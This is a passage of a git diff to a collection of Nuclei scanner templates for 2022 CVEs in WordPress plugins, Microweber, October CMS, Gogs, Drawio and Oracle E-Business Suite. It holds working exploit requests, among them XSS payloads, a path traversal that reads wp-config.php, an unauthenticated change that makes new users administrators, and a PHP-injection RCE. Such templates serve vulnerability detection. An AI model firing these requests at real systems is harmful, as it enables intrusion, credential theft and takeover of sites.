https://wordpress.org/plugins/mapping-multiple-urls-redirect-same-page/ - - https://nvd.nist.gov/vuln/detail/cve-2022-0599 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2022-0599 - cwe-id: CWE-79 - tags: cve,cve2022,wordpress,wp-plugin,xss,wp,authenticated,wpscan - -requests: - - raw: - - | - POST /wp-login.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 - - - | - GET /wp-admin/admin.php?page=mmursp-list&view=edit&mmursp_id="><svg/onload=alert(document.domain)> HTTP/1.1 - Host: {{Hostname}} - - cookie-reuse: true - req-condition: true - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'id="mmursp_id" value="\"><svg/onload=alert(document.domain)>" />' - - - type: dsl - dsl: - - 'status_code_2 == 200' - - 'contains(all_headers_2, "text/html")' - condition: and - -# Enhanced by md on 2022/09/08 diff --git a/nuclei-templates/CVE-2022/cve-2022-0653.yaml b/nuclei-templates/CVE-2022/cve-2022-0653.yaml deleted file mode 100644 index 97a429face..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-0653.yaml +++ /dev/null @@ -1,42 +0,0 @@ -id: CVE-2022-0653 - -info: - name: Wordpress Profile Builder Plugin Cross-Site Scripting - author: dhiyaneshDk - severity: medium - description: | - The Profile Builder User Profile & User Registration Forms WordPress plugin is vulnerable to cross-site scripting due to insufficient escaping and sanitization of the site_url parameter found in the ~/assets/misc/fallback-page.php file which allows attackers to inject arbitrary web scripts onto a pages that executes whenever a user clicks on a specially crafted link by an attacker. This affects versions up to and including 3.6.1.. - reference: - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-0653 - - https://www.wordfence.com/blog/2022/02/reflected-cross-site-scripting-vulnerability-patched-in-wordpress-profile-builder-plugin/ - - https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=2655168%40profile-builder&new=2655168%40profile-builder&sfp_email=&sfph_mail= - remediation: Upgrade to version 3.6.5 or later. - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2022-0653 - cwe-id: CWE-79 - tags: cve,cve2022,wordpress,xss,wp-plugin - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/profile-builder/assets/misc/fallback-page.php?site_url=javascript:alert(document.domain);&message=Not+Found&site_name=404" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - '<a href="javascript:alert(document.domain);">here</a>' - - - type: word - part: header - words: - - "text/html" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/28 diff --git a/nuclei-templates/CVE-2022/cve-2022-0660.yaml b/nuclei-templates/CVE-2022/cve-2022-0660.yaml deleted file mode 100644 index 9cdc808f6e..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-0660.yaml +++ /dev/null @@ -1,50 +0,0 @@ -id: CVE-2022-0660 - -info: - name: Microweber < 1.2.11 - Information Disclosure - author: amit-jd - severity: high - description: | - Generation of error message containing sensitive information while viewing comments from "load_module:comments#search="in Packagist microweber/microweber prior to 1.2.11. - reference: - - https://huntr.dev/bounties/01fd2e0d-b8cf-487f-a16c-7b088ef3a291/ - - https://github.com/advisories/GHSA-hhrj-wp42-32v3 - - https://nvd.nist.gov/vuln/detail/CVE-2022-0660 - - https://huntr.dev/bounties/01fd2e0d-b8cf-487f-a16c-7b088ef3a291 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2022-0660 - cwe-id: CWE-209 - metadata: - verified: "true" - tags: cve2022,microweber,disclosure,authenticated,huntr,cve - -requests: - - raw: - - | - POST /api/user_login HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - username={{username}}&password={{password}} - - - | - POST /module/ HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - Referer: {{BaseURL}}admin/view:comments - - class=+module+module-comments-manage+&id=mw_admin_posts_with_comments&data-type=comments%2Fmanage&parent-module-id=mw-main-module-backend&parent-module=comments&data-search-keyword={{randstr}} - - req-condition: true - cookie-reuse: true - matchers: - - type: dsl - dsl: - - contains(body_2,'QueryException') - - contains(body_2,'SQLSTATE') - - contains(body_2,'runQueryCallback') - - 'contains(all_headers_2,"text/html")' - - 'status_code_2==500' - condition: and diff --git a/nuclei-templates/CVE-2022/cve-2022-0776.yaml b/nuclei-templates/CVE-2022/cve-2022-0776.yaml deleted file mode 100644 index 39746c0077..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-0776.yaml +++ /dev/null @@ -1,40 +0,0 @@ -id: CVE-2022-0776 - -info: - name: RevealJS postMessage <4.3.0 - Cross-Site Scripting - author: LogicalHunter - severity: high - description: RevealJS postMessage before 4.3.0 contains a cross-site scripting vulnerability via the document object model. - reference: - - https://hackerone.com/reports/691977 - - https://github.com/hakimel/reveal.js/pull/3137 - - https://huntr.dev/bounties/be2b7ee4-f487-42e1-874a-6bcc410e4001/ - - https://nvd.nist.gov/vuln/detail/CVE-2022-0776 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N - cvss-score: 7.2 - cwe-id: CWE-79 - cve-id: CVE-2022-0776 - tags: hackerone,huntr,cve,cve2022,headless,postmessage,revealjs - -headless: - - steps: - - args: - url: "{{BaseURL}}" - action: navigate - - action: waitload - - action: script - name: extract - args: - code: | - () => { - return (Reveal.VERSION <= "3.8.0" || Reveal.VERSION < "4.3.0") - } - - matchers: - - type: word - part: extract - words: - - "true" - -# Enhanced by mp on 2022/09/14 diff --git a/nuclei-templates/CVE-2022/cve-2022-0870.yaml b/nuclei-templates/CVE-2022/cve-2022-0870.yaml new file mode 100644 index 0000000000..e97ed1ef8a --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-0870.yaml @@ -0,0 +1,54 @@ +id: CVE-2022-0870 + +info: + name: Gogs - SSRF + author: Akincibor + severity: medium + description: Server-Side Request Forgery (SSRF) in Gogs prior to 0.12.5. + reference: + - https://huntr.dev/bounties/327797d7-ae41-498f-9bff-cc0bf98cf531/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-0870 + - https://github.com/gogs/gogs/commit/91f2cde5e95f146bfe4765e837e7282df6c7cabb + - https://huntr.dev/bounties/327797d7-ae41-498f-9bff-cc0bf98cf531 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2022-0870 + cwe-id: CWE-918 + metadata: + shodan-query: http.favicon.hash:-449283196 + tags: cve,cve2022,ssrf,gogs,huntr + +requests: + - method: GET + path: + - "{{BaseURL}}" + + extractors: + - type: regex + name: version + internal: true + group: 1 + regex: + - '<div class="ui left">\n\s+© \d{4} Gogs Version: ([\d.]+) Page:' + + - type: regex + group: 1 + regex: + - '<div class="ui left">\n\s+© \d{4} Gogs Version: ([\d.]+) Page:' + + matchers-condition: and + matchers: + + - type: regex + part: body + regex: + - '<div class="ui left">\n\s+© \d{4} Gogs Version: ([\d.]+) Page:' + + - type: dsl + dsl: + - compare_versions(version, '< 0.12.5') + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2022/cve-2022-0921.yaml b/nuclei-templates/CVE-2022/cve-2022-0921.yaml deleted file mode 100644 index cd4e13baa8..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-0921.yaml +++ /dev/null @@ -1,57 +0,0 @@ -id: CVE-2022-0954 - -info: - name: Microweber - Cross-site Scripting - author: amit-jd - severity: medium - description: | - Multiple Stored Cross-site Scripting (XSS) Vulnerabilities in Shop's Other Settings, Shop's Autorespond E-mail Settings and Shops' Payments Methods in GitHub repository microweber/microweber prior to 1.2.11. - reference: - - https://github.com/advisories/GHSA-8c76-mxv5-w4g8 - - https://huntr.dev/bounties/b99517c0-37fc-4efa-ab1a-3591da7f4d26/ - - https://github.com/microweber/microweber/commit/955471c27e671c49e4b012e3b120b004082ac3f7 - - https://nvd.nist.gov/vuln/detail/CVE-2022-0954 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N - cvss-score: 5.4 - cve-id: CVE-2022-0954 - cwe-id: CWE-79 - metadata: - verified: "true" - tags: cve,cve2022,xss,microweber - -requests: - - raw: - - | - POST /api/user_login HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - username={{username}}&password={{password}} - - - | - POST /api/save_option HTTP/2 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - Referer: {{BaseURL}}/admin/view:shop/action:options - - option_key=checkout_url&option_group=shop&option_value=%22%3E%3CiMg+SrC%3D%22x%22+oNeRRor%3D%22alert(document.domain)%3B%22%3E&module=shop%2Forders%2Fsettings%2Fother - - - | - POST /module/ HTTP/2 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - Referer: {{BaseURL}}/admin/view:shop/action:options - - module=settings%2Fsystem_settings&id=settings_admin_mw-main-module-backend-settings-admin&class=card-body+pt-3&option_group=shop%2Forders%2Fsettings%2Fother&is_system=1&style=position%3A+relative%3B - - cookie-reuse: true - req-condition: true - matchers: - - type: dsl - dsl: - - 'contains(body_2,"true")' - - contains(body_3,'\"><img src=\"x\" onerror=\"alert(document.domain);\">\" placeholder=\"Use default') - - 'contains(all_headers_3,"text/html")' - - 'status_code_3==200' - condition: and diff --git a/nuclei-templates/CVE-2022/cve-2022-0952.yaml b/nuclei-templates/CVE-2022/cve-2022-0952.yaml new file mode 100644 index 0000000000..c51d27c117 --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-0952.yaml @@ -0,0 +1,52 @@ +id: CVE-2022-0952 + +info: + name: Sitemap by click5 < 1.0.36 - Unauthenticated Arbitrary Options Update + author: random-robbie + severity: high + description: | + The plugin does not have authorisation and CSRF checks when updating options via a REST endpoint, and does not ensure that the option to be updated belongs to the plugin + reference: + - https://wpscan.com/vulnerability/0f694961-afab-44f9-846c-e80a0f6c768b + - https://nvd.nist.gov/vuln/detail/CVE-2022-0952 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2022-0952 + cwe-id: CWE-862 + metadata: + verified: "true" + tags: wp,wp-plugin,sitemap,wpscan,cve,cve2022,wordpress + +requests: + - raw: + - | + POST /wp-json/click5_sitemap/API/update_html_option_AJAX HTTP/1.1 + Host: {{Hostname}} + Content-type: application/json;charset=UTF-8 + + {"users_can_register":"1"} + + - | + POST /wp-json/click5_sitemap/API/update_html_option_AJAX HTTP/1.1 + Host: {{Hostname}} + Content-type: application/json;charset=UTF-8 + + {"default_role":"administrator"} + + - | + POST /wp-json/click5_sitemap/API/update_html_option_AJAX HTTP/1.1 + Host: {{Hostname}} + Content-type: application/json;charset=UTF-8 + + {"users_can_register":"0"} + + req-condition: true + matchers: + - type: dsl + dsl: + - 'contains(all_headers, "application/json")' + - "status_code == 200" + - "contains(body_1, 'users_can_register')" + - "contains(body_2, 'default_role')" + condition: and diff --git a/nuclei-templates/CVE-2022/cve-2022-0963.yaml b/nuclei-templates/CVE-2022/cve-2022-0963.yaml new file mode 100644 index 0000000000..5a03cfe931 --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-0963.yaml @@ -0,0 +1,71 @@ +id: CVE-2022-0963 + +info: + name: Microweber <1.2.12 - Stored Cross-Site Scripting + author: amit-jd + severity: medium + description: | + Microweber prior to 1.2.12 contains a stored cross-site scripting vulnerability. It allows unrestricted upload of XML files,. + reference: + - https://huntr.dev/bounties/a89a4198-0880-4aa2-8439-a463f39f244c/ + - https://github.com/advisories/GHSA-q3x2-jvp3-wj78 + - https://huntr.dev/bounties/a89a4198-0880-4aa2-8439-a463f39f244c + - https://nvd.nist.gov/vuln/detail/CVE-2022-0963 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2022-0963 + cwe-id: CWE-79 + metadata: + verified: "true" + tags: xss,microweber,cms,authenticated,huntr,cve,cve2022,intrusive + +requests: + - raw: + - | + POST /api/user_login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + username={{username}}&password={{password}} + + - | + POST /plupload HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=---------------------------59866212126262636974202255034 + Referer: {{BaseURL}}admin/view:modules/load_module:files + + -----------------------------59866212126262636974202255034 + Content-Disposition: form-data; name="name" + + {{randstr}}.xml + -----------------------------59866212126262636974202255034 + Content-Disposition: form-data; name="chunk" + + 0 + -----------------------------59866212126262636974202255034 + Content-Disposition: form-data; name="chunks" + + 1 + -----------------------------59866212126262636974202255034 + Content-Disposition: form-data; name="file"; filename="blob" + Content-Type: application/octet-stream + + <x:script xmlns:x="http://www.w3.org/1999/xhtml">alert(document.domain)</x:script> + -----------------------------59866212126262636974202255034-- + + - | + GET /userfiles/media/default/{{to_lower("{{randstr}}")}}.xml HTTP/1.1 + Host: {{Hostname}} + + req-condition: true + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'contains(body_3,"alert(document.domain)")' + - 'status_code_3==200' + - 'contains(body_2,"bytes_uploaded")' + condition: and + +# Enhanced by mp on 2022/09/14 diff --git a/nuclei-templates/CVE-2022/cve-2022-1020.yaml b/nuclei-templates/CVE-2022/cve-2022-1020.yaml deleted file mode 100644 index 4293352fff..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-1020.yaml +++ /dev/null @@ -1,46 +0,0 @@ -id: CVE-2022-1020 - -info: - name: WordPress WooCommerce <3.1.2 - Arbitrary Function Call - author: Akincibor - severity: critical - description: WordPress WooCommerce plugin before 3.1.2 does not have authorisation and CSRF checks in the wpt_admin_update_notice_option AJAX action (available to both unauthenticated and authenticated users), as well as does not validate the callback parameter, allowing unauthenticated attackers to call arbitrary functions with either none or one user controlled argument. - reference: - - https://wpscan.com/vulnerability/04fe89b3-8ad1-482f-a96d-759d1d3a0dd5 - - https://nvd.nist.gov/vuln/detail/CVE-2022-1020 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2022-1020 - cwe-id: CWE-352,CWE-862 - tags: wpscan,wp,wp-plugin,wordpress,cve,cve2022,unauth - -requests: - - raw: - - | - POST /wp-admin/admin-ajax.php?action=wpt_admin_update_notice_option HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - option_key=a&perpose=update&callback=phpinfo - - matchers-condition: and - matchers: - - type: word - words: - - "PHP Extension" - - "PHP Version" - condition: and - - - type: status - status: - - 200 - - extractors: - - type: regex - part: body - group: 1 - regex: - - '>PHP Version <\/td><td class="v">([0-9.]+)' - -# Enhanced by mp on 2022/05/18 diff --git a/nuclei-templates/CVE-2022/cve-2022-1119.yaml b/nuclei-templates/CVE-2022/cve-2022-1119.yaml deleted file mode 100644 index 2e0ecf66e8..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-1119.yaml +++ /dev/null @@ -1,40 +0,0 @@ -id: CVE-2022-1119 - -info: - name: WordPress Simple File List <3.2.8 - Local File Inclusion - author: random-robbie - severity: high - description: | - WordPress Simple File List before 3.2.8 is vulnerable to local file inclusion via the eeFile parameter in the ~/includes/ee-downloader.php due to missing controls which make it possible for unauthenticated attackers retrieve arbitrary files. - reference: - - https://wpscan.com/vulnerability/5551038f-64fb-44d8-bea0-d2f00f04877e - - https://wpscan.com/vulnerability/075a3cc5-1970-4b64-a16f-3ec97e22b606 - - https://plugins.trac.wordpress.org/browser/simple-file-list/trunk/includes/ee-downloader.php?rev=2071880 - - https://nvd.nist.gov/vuln/detail/CVE-2022-1119 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2022-1119 - cwe-id: CWE-22 - tags: wp,wp-plugin,wpscan,cve,cve2022,lfi,wordpress - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/simple-file-list/includes/ee-downloader.php?eeFile=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/wp-config.php" - - matchers-condition: and - matchers: - - - type: word - part: body - words: - - "DB_NAME" - - "DB_PASSWORD" - condition: and - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/06/29 diff --git a/nuclei-templates/CVE-2022/cve-2022-1221.yaml b/nuclei-templates/CVE-2022/cve-2022-1221.yaml new file mode 100644 index 0000000000..6c2b34470f --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-1221.yaml @@ -0,0 +1,45 @@ +id: CVE-2022-1221 + +info: + name: WordPress Gwyn's Imagemap Selector <=0.3.3 - Cross-Site Scripting + author: veshraj + severity: medium + description: | + Wordpress Gwyn's Imagemap Selector plugin 0.3.3 and prior contains a reflected cross-site scripting vulnerability. It does not sanitize the id and class parameters before returning them back in attributes. + reference: + - https://wpscan.com/vulnerability/641be9f6-2f74-4386-b16e-4b9488f0d2a9 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1221 + - https://nvd.nist.gov/vuln/detail/CVE-2022-1221 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-1221 + cwe-id: CWE-79 + metadata: + verified: "true" + tags: cve2022,wpscan,xss,wordpress,wp-plugin,wp,cve + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/gwyns-imagemap-selector/popup.php?id=1&class=%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + - '{{BaseURL}}/wp-content/plugins/gwyns-imagemap-selector/popup.php?id=1%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - "</script><script>alert(document.domain)</script> popup-" + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 + +# Enhanced by md on 2022/09/12 diff --git a/nuclei-templates/CVE-2022/cve-2022-1392.yaml b/nuclei-templates/CVE-2022/cve-2022-1392.yaml deleted file mode 100644 index b75a81b595..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-1392.yaml +++ /dev/null @@ -1,38 +0,0 @@ -id: CVE-2022-1392 - -info: - name: WordPress Videos sync PDF <=1.7.4 - Local File Inclusion - author: Veshraj - severity: high - description: WordPress Videos sync PDF 1.7.4 and prior does not validate the p parameter before using it in an include statement, which could lead to local file inclusion. - reference: - - https://wpscan.com/vulnerability/fe3da8c1-ae21-4b70-b3f5-a7d014aa3815 - - https://packetstormsecurity.com/files/166534/ - - https://nvd.nist.gov/vuln/detail/CVE-2022-1392 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2022-1392 - metadata: - verified: true - tags: lfi,wp-plugin,unauth,wpscan,cve,cve2022,packetstorm,wp,wordpress - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/video-synchro-pdf/reglages/Menu_Plugins/tout.php?p=tout" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "failed to open stream: No such file or directory" - - "REPERTOIRE_VIDEOSYNCPDFreglages/Menu_Plugins/tout.php" - condition: and - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/06/29 diff --git a/nuclei-templates/CVE-2022/cve-2022-1439.yaml b/nuclei-templates/CVE-2022/cve-2022-1439.yaml deleted file mode 100644 index b1a66614ea..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-1439.yaml +++ /dev/null @@ -1,40 +0,0 @@ -id: CVE-2022-1439 - -info: - name: Microweber <1.2.15 - Cross-Site Scripting - author: pikpikcu - severity: medium - description: Microweber prior to 1.2.15 contains a reflected cross-site scripting vulnerability. An attacker can execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. - reference: - - https://huntr.dev/bounties/86f6a762-0f3d-443d-a676-20f8496907e0/ - - https://huntr.dev/bounties/86f6a762-0f3d-443d-a676-20f8496907e0 - - https://github.com/microweber/microweber/commit/ad3928f67b2cd4443f4323d858b666d35a919ba8 - - https://nvd.nist.gov/vuln/detail/CVE-2022-1439 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2022-1439 - cwe-id: CWE-79 - metadata: - shodan-query: http.favicon.hash:780351152 - tags: cve,cve2022,microweber,xss,huntr - -requests: - - method: GET - path: - - '{{BaseURL}}/module/?module=%27onm%3Ca%3Eouseover=alert(document.domain)%27%22tabindex=1&style=width:100%25;height:100%25;&id=x&data-show-ui=admin&class=x&from_url={{BaseURL}}' - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - part: body - words: - - "<div class='x module module-'onmouseover=alert(document.domain) '" - - "parent-module-id" - condition: and - -# Enhanced by md on 2022/09/12 diff --git a/nuclei-templates/CVE-2022/cve-2022-1815.yaml b/nuclei-templates/CVE-2022/cve-2022-1815.yaml deleted file mode 100644 index f7a27e1593..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-1815.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: CVE-2022-1815 - -info: - name: Drawio < 18.1.2 - Server Side Request Forgery - author: amit-jd - severity: high - description: | - SSRF in /service endpoint in jgraph/drawio prior to 18.1.2. Exposure of Sensitive Information to an Unauthorized Actor in GitHub repository jgraph/drawio prior to 18.1.2. - reference: - - https://huntr.dev/bounties/6e856a25-9117-47c6-9375-52f78876902f/ - - https://nvd.nist.gov/vuln/detail/CVE-2022-1815 - - https://huntr.dev/bounties/6e856a25-9117-47c6-9375-52f78876902f - - https://github.com/jgraph/drawio/commit/c287bef9101d024b1fd59d55ecd530f25000f9d8 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2022-1815 - cwe-id: CWE-918 - metadata: - verified: "true" - tags: huntr,cve,cve2022,drawio,ssrf,oast,oss,jgraph - -requests: - - raw: - - | - GET /service/0/test.oast.me HTTP/2 - Host: {{Hostname}} - - matchers: - - type: dsl - dsl: - - "contains(body, 'Interactsh Server')" - - status_code == 200 - condition: and diff --git a/nuclei-templates/CVE-2022/CVE-2022-21371.yaml b/nuclei-templates/CVE-2022/cve-2022-21371.yaml similarity index 100% rename from nuclei-templates/CVE-2022/CVE-2022-21371.yaml rename to nuclei-templates/CVE-2022/cve-2022-21371.yaml diff --git a/nuclei-templates/CVE-2022/cve-2022-21500.yaml b/nuclei-templates/CVE-2022/cve-2022-21500.yaml deleted file mode 100644 index 2a4dc2ff2e..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-21500.yaml +++ /dev/null @@ -1,51 +0,0 @@ -id: CVE-2022-21500 - -info: - name: Oracle E-Business Suite <=12.2 - Authentication Bypass - author: 0xpugazh - severity: high - description: | - Oracle E-Business Suite (component: Manage Proxies) 12.1 and 12.2 are susceptible to an easily exploitable vulnerability that allows an unauthenticated attacker with network access via HTTP to compromise it by self-registering for an account. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle E-Business Suite accessible data. - remediation: | - Apply the necessary security patches or updates provided by Oracle to mitigate this vulnerability. - reference: - - https://orwaatyat.medium.com/my-new-discovery-in-oracle-e-business-login-panel-that-allowed-to-access-for-all-employees-ed0ec4cad7ac - - https://twitter.com/GodfatherOrwa/status/1514720677173026816 - - https://www.oracle.com/security-alerts/alert-cve-2022-21500.html - - https://nvd.nist.gov/vuln/detail/CVE-2022-21500 - - https://www.oracle.com/security-alerts/cpujul2022.html - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2022-21500 - epss-score: 0.29303 - epss-percentile: 0.96354 - cpe: cpe:2.3:a:oracle:e-business_suite:12.2:*:*:*:*:*:*:* - metadata: - verified: true - max-request: 3 - vendor: oracle - product: e-business_suite - shodan-query: http.title:"Login" "X-ORACLE-DMS-ECID" 200 - tags: cve,cve2022,oracle,misconfig,auth-bypass - -http: - - method: GET - path: - - '{{BaseURL}}/OA_HTML/ibeCRgpPrimaryCreate.jsp' - - '{{BaseURL}}/OA_HTML/ibeCRgpIndividualUser.jsp' - - '{{BaseURL}}/OA_HTML/ibeCRgpPartnerPriCreate.jsp' - - stop-at-first-match: true - matchers-condition: and - matchers: - - type: word - words: - - 'Registration' - - 'Register as individual' - - '<!-- ibeCZzpRuntimeIncl.jsp end -->' - condition: and - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2022/cve-2022-21705.yaml b/nuclei-templates/CVE-2022/cve-2022-21705.yaml deleted file mode 100644 index 1e09625694..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-21705.yaml +++ /dev/null @@ -1,109 +0,0 @@ -id: CVE-2022-21705 - -info: - name: October CMS - Remote Code Execution - author: iPhantasmic - severity: high - description: | - October CMS is susceptible to remote code execution. In affected versions, user input is not properly sanitized before rendering. An authenticated user with the permissions to create, modify, and delete website pages can bypass cms.safe_mode and cms.enableSafeMode in order to execute arbitrary code. This affects admin panels that rely on safe mode and restricted permissions. - remediation: | - The issue has been patched in Build 474 (1.0.474) and 1.1.10. Users unable to upgrade should apply https://github.com/octobercms/library/commit/c393c5ce9ca2c5acc3ed6c9bb0dab5ffd61965fe manually to installation. - reference: - - https://github.com/octobercms/library/commit/c393c5ce9ca2c5acc3ed6c9bb0dab5ffd61965fe - - https://github.com/octobercms/october/security/advisories/GHSA-79jw-2f46-wv22 - - https://cyllective.com/blog/post/octobercms-cve-2022-21705/ - - https://nvd.nist.gov/vuln/detail/CVE-2022-21705 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H - cvss-score: 7.2 - cve-id: CVE-2022-21705 - cwe-id: CWE-74 - tags: cve,cve2022,authenticated,rce,cms,octobercms,injection - -requests: - - raw: - - | # to obtain session_key and token - GET /backend/backend/auth/signin HTTP/1.1 - Host: {{Hostname}} - - - | # to perform authentication and obtain admin cookies - POST /backend/backend/auth/signin HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - _session_key={{session_key}}&_token={{token}}&postback=1&login={{username}}&password={{password}} - - - | # to inject php code in Markup editor and perform exploit - POST /backend/cms HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - X-OCTOBER-REQUEST-HANDLER: onSave - X-OCTOBER-REQUEST-PARTIALS: - X-Requested-With: XMLHttpRequest - - _session_key={{session_key}}&_token={{token}}&settings%5Btitle%5D={{randstr}}&settings%5Burl%5D=%2F{{randstr}}&fileName={{randstr}}&settings%5Blayout%5D=&settings%5Bdescription%5D=&settings%5Bis_hidden%5D=0&settings%5Bmeta_title%5D=&settings%5Bmeta_description%5D=&markup=%3C%3Fphp%0D%0A%0D%0Afunction+onInit()+%7B%0D%0A++++phpinfo()%3B%0D%0A%7D%0D%0A%0D%0A%3F%3E%0D%0A%3D%3D%0D%0A&code=&templateType=page&templatePath=&theme=demo&templateMtime=&templateForceSave=0 - - - | # to obtain theme - POST /backend/cms HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - X-OCTOBER-REQUEST-HANDLER: onCreateTemplate - X-OCTOBER-REQUEST-PARTIALS: - X-Requested-With: XMLHttpRequest - - _session_key={{session_key}}&_token={{token}}&search=&type=page - - - | # to access the template page for generated exploit - POST /backend/cms HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - X-OCTOBER-REQUEST-HANDLER: onOpenTemplate - X-OCTOBER-REQUEST-PARTIALS: - X-Requested-With: XMLHttpRequest - - _session_key={{session_key}}&_token={{token}}&search=&{{theme}}=demo&type=page&path={{randstr}}.htm - - cookie-reuse: true - - extractors: - - type: xpath - name: session_key - attribute: value - xpath: - - "/html/body/div[1]/div/div[2]/div/div/form/input[1]" - internal: true - # Obtain _session_key for current OctoberCMS session - - - type: xpath - name: token - attribute: value - xpath: - - "/html/body/div[1]/div/div[2]/div/div/form/input[2]" - internal: true - # Obtain _token for current OctoberCMS session - - - type: regex - name: theme - part: body - group: 1 - regex: - - '<input\stype=\\"hidden\\"\svalue=\\"demo\\"\sname=\\"([^"]*)\\"' - internal: true - # Obtain current theme used for Markup editor of OctoberCMS - - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'function onInit()' - - 'phpinfo()' - - 'Safe mode is currently enabled. Editing the PHP code of CMS templates is disabled. To disable safe mode, set the `cms.enableSafeMode` configuration value to `false`.' - condition: and - # if exploit executes, phpinfo() should now be exposed at the /{{randstr}} endpoint, even though Safe mode is enabled - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/10/06 diff --git a/nuclei-templates/CVE-2022/CVE-2022-22947.yaml b/nuclei-templates/CVE-2022/cve-2022-22947.yaml similarity index 100% rename from nuclei-templates/CVE-2022/CVE-2022-22947.yaml rename to 